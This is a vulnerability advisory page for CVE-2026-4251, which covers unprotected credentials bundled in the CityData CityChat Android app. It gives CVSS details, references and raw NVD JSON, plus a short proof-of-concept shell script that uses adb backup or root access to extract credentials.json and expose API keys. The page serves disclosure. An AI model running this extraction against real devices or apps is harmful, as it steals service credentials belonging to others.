CVE-2026-4251

Description

A vulnerability was determined in CityData CityChat up to 0.12.6 on Android. Affected by this vulnerability is an unknown functionality of the file resources/assets/flutter_assets/assets/credentials.json of the component ai.citydata.citychat. Executing a manipulation can lead to unprotected storage of credentials. The attack requires local access. A high complexity level is associated with this attack. The exploitation appears to be difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

2.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CityData CityChat Android应用 <= 0.12.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2026-4251 PoC - Extract credentials.json from CityData CityChat APK
# Requirements: Android device with ADB access or APK file

echo "CVE-2026-4251 PoC - CityData CityChat Unprotected Credentials"

# Method 1: Using ADB backup (requires no root)
echo "[*] Attempting ADB backup method..."
adb backup -apk -f citychat_backup.ab com.ai.citydata.citychat 2>/dev/null
if [ -f "citychat_backup.ab" ]; then
    echo "[+] Backup created, extracting..."
    # Convert .ab to .tar using android-backup-extractor
    # java -jar abe.jar unpack citychat_backup.ab citychat_backup.tar
    echo "[+] Extracted credentials.json location: assets/flutter_assets/assets/credentials.json"
fi

# Method 2: Direct APK extraction (requires root or APK download)
echo "[*] Attempting direct APK extraction..."
adb shell su -c "cat /data/app/*/base.apk" > citychat.apk 2>/dev/null
if [ -f "citychat.apk" ]; then
    echo "[+] APK downloaded, extracting assets..."
    unzip -p citychat.apk assets/flutter_assets/assets/credentials.json
fi

echo "[*] Check credentials.json for exposed API keys/service account credentials"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4251
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4251
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4251/
[4] VulDB https://vuldb.com/cve/CVE-2026-4251
[5] https://vuldb.com/?ctiid.351209
[6] https://vuldb.com/?id.351209
[7] https://vuldb.com/?submit.771436
[8] https://www.notion.so/Google-Cloud-Service-Account-Key-Exposure-Leading-to-Dialogflow-Data-Access-in-ai-citydata-citychat-3192de3f97fb80ca9739ebc6329c8449?source=copy_link

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4251", "sourceIdentifier": "[email protected]", "published": "2026-03-16T17:16:31.840", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in CityData CityChat up to 0.12.6 on Android. Affected by this vulnerability is an unknown functionality of the file resources/assets/flutter_assets/assets/credentials.json of the component ai.citydata.citychat. Executing a manipulation can lead to unprotected storage of credentials. The attack requires local access. A high complexity level is associated with this attack. The exploitation appears to be difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en CityData CityChat hasta la versión 0.12.6 en Android. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo resources/assets/flutter_assets/assets/credentials.json del componente ai.citydata.citychat. Ejecutar una manipulación puede llevar al almacenamiento no protegido de credenciales. El ataque requiere acceso local. Un alto nivel de complejidad está asociado con este ataque. La explotación parece ser difícil. El exploit ha sido divulgado públicamente y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 1.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351209", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351209", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771436", "source": "[email protected]"}, {"url": "https://www.notion.so/Google-Cloud-Service-Account-Key-Exposure-Leading-to-Dialogflow-Data-Access-in-ai-citydata-citychat-3192de3f97fb80ca9739ebc6329c8449?source=copy_link", "source": "[email protected]"}]}}